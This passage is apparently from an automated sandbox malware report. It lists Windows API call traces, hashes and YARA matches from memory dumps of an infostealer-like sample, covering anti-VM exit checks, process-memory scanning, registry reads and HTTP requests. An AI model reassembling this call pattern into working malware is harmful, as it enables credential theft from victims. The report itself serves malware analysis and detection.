                                                            • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                                            • String ID:
                                                            • API String ID: 700816787-0
                                                            • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                            • Instruction ID: 985516c6a567e9979c7789ec1ba92c41fceb340a74dbe4baf8dcf9c2376ddfbd
                                                            • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                            • Instruction Fuzzy Hash: D0612BB5D1026C9BDB24DB90CC44FE9B7B9BF48304F0085E9E649A6144DBB4ABC6CF91
                                                            APIs
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022D64E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022D6548
                                                              • Part of subcall function 022D64E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 022D656A
                                                              • Part of subcall function 022D64E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022D659C
                                                              • Part of subcall function 022D64E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022D65EC
                                                              • Part of subcall function 022D64E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022D6626
                                                              • Part of subcall function 022D64E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022D6638
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                            • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022E557F
                                                            • lstrlen.KERNEL32(00000000), ref: 022E5596
                                                              • Part of subcall function 022E9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022E90B9
                                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 022E55CB
                                                            • lstrlen.KERNEL32(00000000), ref: 022E55EA
                                                            • strtok.MSVCRT(00000000,?), ref: 022E5605
                                                            • lstrlen.KERNEL32(00000000), ref: 022E5615
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                            • String ID:
                                                            • API String ID: 3532888709-0
                                                            • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                            • Instruction ID: 1ced987d4e87149b9c0a6b98270ef0a8d6ce9bfccf57fa706730ccda712ff8dc
                                                            • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                            • Instruction Fuzzy Hash: C951D6709203489BCF28EFE4CA95AFD7776AF60304FD04018E80B666A8EB746B55DF51
                                                            APIs
                                                            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 022E7345
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,022E7574,004205BD), ref: 022E7383
                                                            • memset.MSVCRT ref: 022E73D1
                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 022E7525
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: OpenProcesslstrcpymemset
                                                            • String ID:
                                                            • API String ID: 224852652-0
                                                            • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                            • Instruction ID: 446d094d11ffc115d9bd27588527ddb05539baa11e63a0a4d21ca1f5bf8cb074
                                                            • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                            • Instruction Fuzzy Hash: A0518FB0C203199BDF24DBE4DC84BEDF775AF44305F9041A9E606A7284EB746A88DF58
                                                            APIs
                                                            • memset.MSVCRT ref: 004140D5
                                                            • RegOpenKeyExA.ADVAPI32(80000001,008799B8,00000000,00020119,?), ref: 004140F4
                                                            • RegQueryValueExA.ADVAPI32(?,0087A770,00000000,00000000,00000000,000000FF), ref: 00414118
                                                            • RegCloseKey.ADVAPI32(?), ref: 00414122
                                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                                            • lstrcatA.KERNEL32(?,0087A548), ref: 0041415B
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$CloseOpenQueryValuememset
                                                            • String ID:
                                                            • API String ID: 2623679115-0
                                                            • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                            • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                                            • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                            • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                                            APIs
                                                            • memset.MSVCRT ref: 022E433C
                                                            • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 022E435B
                                                            • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 022E437F
                                                            • RegCloseKey.ADVAPI32(?), ref: 022E4389
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E43AE
                                                            • lstrcat.KERNEL32(?,0064A168), ref: 022E43C2
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$CloseOpenQueryValuememset
                                                            • String ID:
                                                            • API String ID: 2623679115-0
                                                            • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                            • Instruction ID: 774d50453fc92d8a0cf0f41e48c519431a2f8cf08798a2021fe9358087ec2b5a
                                                            • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                            • Instruction Fuzzy Hash: F641C4B6950208BBDF14FBE0DC45FEE333AAB49300F40455CA61A571D4EA759698CFE2
                                                            APIs
                                                            • strtok_s.MSVCRT ref: 00413588
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • strtok_s.MSVCRT ref: 004136D1
                                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00876340,?,0042110C,?,00000000), ref: 0041A82B
                                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpystrtok_s$lstrlen
                                                            • String ID:
                                                            • API String ID: 3184129880-0
                                                            • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                            • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                                            • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                            • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                                            APIs
                                                            • __lock.LIBCMT ref: 0041B39A
                                                              • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                                              • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                                              • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                                            • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                                            • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                                              • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                                            • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                                            • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                                            • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                            • String ID:
                                                            • API String ID: 2005412495-0
                                                            • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                            • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                                            • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                            • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                                            APIs
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022E9B08
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022E9B21
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022E9B39
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022E9B51
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022E9B6A
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022E9B82
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 022E9B9A
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022E9BB3
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 022E9BCB
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 022E9BE3
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 022E9BFC
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022E9C14
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 022E9C2C
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 022E9C45
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022D1437: ExitProcess.KERNEL32 ref: 022D1478
                                                              • Part of subcall function 022D13C7: GetSystemInfo.KERNEL32(?), ref: 022D13D1
                                                              • Part of subcall function 022D13C7: ExitProcess.KERNEL32 ref: 022D13E5
                                                              • Part of subcall function 022D1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 022D1392
                                                              • Part of subcall function 022D1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 022D1399
                                                              • Part of subcall function 022D1377: ExitProcess.KERNEL32 ref: 022D13AA
                                                              • Part of subcall function 022D1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022D14A5
                                                              • Part of subcall function 022D1487: __aulldiv.LIBCMT ref: 022D14BF
                                                              • Part of subcall function 022D1487: __aulldiv.LIBCMT ref: 022D14CD
                                                              • Part of subcall function 022D1487: ExitProcess.KERNEL32 ref: 022D14FB
                                                              • Part of subcall function 022E69D7: GetUserDefaultLangID.KERNEL32 ref: 022E69DB
                                                              • Part of subcall function 022D13F7: ExitProcess.KERNEL32 ref: 022D142D
                                                              • Part of subcall function 022E7AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,022D141E), ref: 022E7AE7
                                                              • Part of subcall function 022E7AB7: RtlAllocateHeap.NTDLL(00000000), ref: 022E7AEE
                                                              • Part of subcall function 022E7AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 022E7B06
                                                              • Part of subcall function 022E7B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E7B77
                                                              • Part of subcall function 022E7B47: RtlAllocateHeap.NTDLL(00000000), ref: 022E7B7E
                                                              • Part of subcall function 022E7B47: GetComputerNameA.KERNEL32(?,00000104), ref: 022E7B96
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022E6D31
                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022E6D4F
                                                            • CloseHandle.KERNEL32(00000000), ref: 022E6D60
                                                            • Sleep.KERNEL32(00001770), ref: 022E6D6B
                                                            • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022E6D81
                                                            • ExitProcess.KERNEL32 ref: 022E6D89
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 2525456742-0
                                                            • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                            • Instruction ID: 6b802aba971a2a858e44c7199d19aa7b74a3148ea55deb98e58b0bce65c7f0ec
                                                            • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                            • Instruction Fuzzy Hash: D7314671A60308ABDF04FBF0DC54BFD737AAF64300F905518A103A6298EF746A44DE61
                                                            APIs
                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                            • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                            • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                            • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                            • String ID:
                                                            • API String ID: 2311089104-0
                                                            • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                            • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                                            • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                            • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                                            APIs
                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022D9C53
                                                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 022D9C78
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 022D9C98
                                                            • ReadFile.KERNEL32(000000FF,?,00000000,022D16F6,00000000), ref: 022D9CC1
                                                            • LocalFree.KERNEL32(022D16F6), ref: 022D9CF7
                                                            • CloseHandle.KERNEL32(000000FF), ref: 022D9D01
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                            • String ID:
                                                            • API String ID: 2311089104-0
                                                            • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                            • Instruction ID: 57d0184eccfd883a9fbe46d84bccd4f6d7df6eced763943a331e98d88b1d335f
                                                            • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                            • Instruction Fuzzy Hash: AE3114B8A10209EFDB14CFD4C884BAE77F5FB48304F108158F915AB294D778AA81CFA1
                                                            APIs
                                                            • __getptd.LIBCMT ref: 0041C9EA
                                                              • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                              • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                            • __amsg_exit.LIBCMT ref: 0041CA0A
                                                            • __lock.LIBCMT ref: 0041CA1A
                                                            • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                                            • free.MSVCRT ref: 0041CA4A
                                                            • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                            • String ID:
                                                            • API String ID: 634100517-0
                                                            • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                            • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                                            • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                            • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                                            APIs
                                                            • __getptd.LIBCMT ref: 022ECC51
                                                              • Part of subcall function 022EC206: __getptd_noexit.LIBCMT ref: 022EC209
                                                              • Part of subcall function 022EC206: __amsg_exit.LIBCMT ref: 022EC216
                                                            • __amsg_exit.LIBCMT ref: 022ECC71
                                                            • __lock.LIBCMT ref: 022ECC81
                                                            • InterlockedDecrement.KERNEL32(?), ref: 022ECC9E
                                                            • free.MSVCRT ref: 022ECCB1
                                                            • InterlockedIncrement.KERNEL32(0042B980), ref: 022ECCC9
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                            • String ID:
                                                            • API String ID: 634100517-0
                                                            • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                            • Instruction ID: e28fbded98c7fd5dae72b16c23fdeb074884fefa5ce1b9942b7ceca60593d41b
                                                            • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                            • Instruction Fuzzy Hash: BF01D232A21B26ABCF21ABE5944475D7760FF04714FC04127EC16672A8CB746881FFE9
                                                            APIs
                                                            • strlen.MSVCRT ref: 00416F1F
                                                            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                                              • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                                              • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                                            • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                                            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                                              • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: strlen$MemoryProcessQueryReadVirtual
                                                            • String ID: @
                                                            • API String ID: 2950663791-2766056989
                                                            • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                            • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                                            • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                            • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                                            APIs
                                                            • strlen.MSVCRT ref: 022E7186
                                                            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,022E7401,00000000,00420BA8,00000000,00000000), ref: 022E71B4
                                                              • Part of subcall function 022E6E37: strlen.MSVCRT ref: 022E6E48
                                                              • Part of subcall function 022E6E37: strlen.MSVCRT ref: 022E6E6C
                                                            • VirtualQueryEx.KERNEL32(022E7574,00000000,?,0000001C), ref: 022E71F9
                                                            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022E7401), ref: 022E731A
                                                              • Part of subcall function 022E7047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 022E705F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: strlen$MemoryProcessQueryReadVirtual
                                                            • String ID: @
                                                            • API String ID: 2950663791-2766056989
                                                            • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                            • Instruction ID: 1a5eb8b31e6e47d254f1ef9652c013fac4ea2837b66191479c99be81b83a4cc8
                                                            • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                            • Instruction Fuzzy Hash: B151F8B1D1010AEBDF04CFD8D991AEFB7B6BF88300F048519F916A7244D774AA01DBA1
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
